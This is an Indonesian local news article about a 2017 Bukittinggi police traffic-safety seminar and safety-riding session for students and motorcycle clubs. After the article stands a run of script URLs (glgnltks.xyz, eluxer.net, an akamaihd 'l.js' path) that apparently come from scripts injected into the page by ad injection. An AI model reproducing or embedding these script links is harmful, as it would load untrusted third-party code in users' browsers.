Sigap Polisi

Satlantas Polres Bukittinggi Kenalkan Aturan Lalu Lintas Pada Mahasiswa dan Klub Motor

HaloBukittinggi : Untuk meningkatkan pengetahuan tentang aturan berlalu lintas dan juga untuk meminimalisir kasus kecelakaan lalu lintas, dalam rangkaian Operasi Patuh Singgalang 2017, Satuan Lalu Lintas Polres Bukittinggi ajak mahasiswa dan klub motor mengikuti seminar Police Goes to Kamus dan Safety Riding dengan leading sektor Korlantas Polri.

Kasat Lantas Polres Bukittinggi AKP Sukur Hendri Saputra, Rabu (10/5/2017), menjelaskan, mahasiswa merupakan salah satu pengendara terbanyak untuk sepeda motor, begitu juga klub motor, sehingga mereka wajib mengetahui aturan berlalu lintas yang benar, sehingga paham dengan tata cara membawa kendaraan yang benar dan menjaga tata tertib di jalan raya.

“Dari catatan kecelakaan mahasiswa, pelajar, dan klub motor banyak menjadi korban kecelakaan lalu lintas, sehingga mereka perlu diingatkan kembali apa bahaya yang ditimbulkan di jalan raya saat melanggar aturan, bagaimana memanfaatkan ruas jalan yang benar, tidak memacu kendaraan dengan kecepatan tinggi, aturan memotong lawan, serta aturan lain yang wajib diketahui pengendara,” ujarnya.

Menurut Sukur Hendri Saputra, dalam Operasi Patuh Singgalang 2017, Satuan Lalu Lintas Polres Bukittinggi akan menindak setiap pelanggaran yang terjadi, dan sebagai efek jera para pelanggar aturan itu juga akan ditilang sesuai dengan kesalahan yang dilakukan.

“Maka dari itu dalam seminar Police Goes to Kamus dan Safety Riding, mahasiswa dan klub motor ini diberikan arahan tentang aturan lalu lintas, sehingga mereka juga dapat memberikan arahan pada teman, keluarga, dan masyarakat di sekelilingnya, bagaimana tata cara berlalu lintas yang baik dan benar,” terangnya.

Sukur Hendri Saputra menambahkan, seminar Police Goes to Kamus diikuti 537 peserta dari puluhan kampus yang diundang, dan dalam kegiatan Safety Riding diikuti 330 peserta dari beberapa klub motor dari Kota Bukittinggi, Kota Payakumbuh, Kota Padang Panjang, Kabupaten Padang Pariaman, Kabupaten Limapuluh Kota, dan Kabupaten Pasaman.

“Keselamatan menjadi hal yang paling penting dalam berlalu lintas, tidak saja diri sendiri, namun juga diperhatikan keselamatan orang lain sebagai pengguna jalan, jangan hanya mementingkan kecepatan, karena kesalahan sedikit saja akan berakibat fatal saat terjadinya kecelakaan,” ulasnya.

Dalam seminar Police Goes to Kamus itu sambung Sukur Hendri Saputra, ratusan mahasiswa ini diajak tim dari Korlantas Polri untuk diskusi panel, dibagi dalam lima kelompok yang telah di bagi, dari sini mahasiswa diberikan arahan tentang aturan berlalu lintas, sehingga mereka sadar bahwa arti pentingnya menjaga keselamatan.

“Sementara itu dalam Safety Riding, tim Korlantas Polri memberikan praktek, mulai dari kesiapan fisik untuk berkendara, bagaimana cara mencek kendaraan sehingga layak untuk dipakai, mempraktek kan cara berkendara yang benar, teknik memakai rem depan dan belakang, cara berkendara di jalan lurus dan saat berbelok, hingga menjaga kestabilan motor saat melalui jalan yang dinilai cukup sulit untuk dilalui,” tukasnya.

Sukur Hendri Saputra berharap, dengan adanya seminar Police Goes to Kamus dan Safety Riding ini, mahasiswa dan klub motor paham dengan aturan lalu lintas, sehingga terhindar dari kecelakaan, sekaligus dalam hal ini Satuan Lalu Lintas Polres Bukittinggi menargetkan tidak terjadi peningkatan angka kecelakaan yang sangat berakibat fatal bagi pengendara dan orang lain. (Dipra)

https://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2449&ext=Advertisehttps://cdncache-a.akamaihd.net/sub/nee5452/51565_4460_/l.js?pid=2450&ext=Not%20sethttps://glgnltks.xyz/addons/lnkr5.min.jshttps://glgnltks.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51565_4460_https://glgnltks.xyz/ext/116c6de661dcbbd02f.js?sid=51565_4460_&title=Not%20set&blocks%5B%5D=1f755&blocks%5B%5D=4d09a

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Populer

Copyright © 2016 HaloBukittinggi

To Top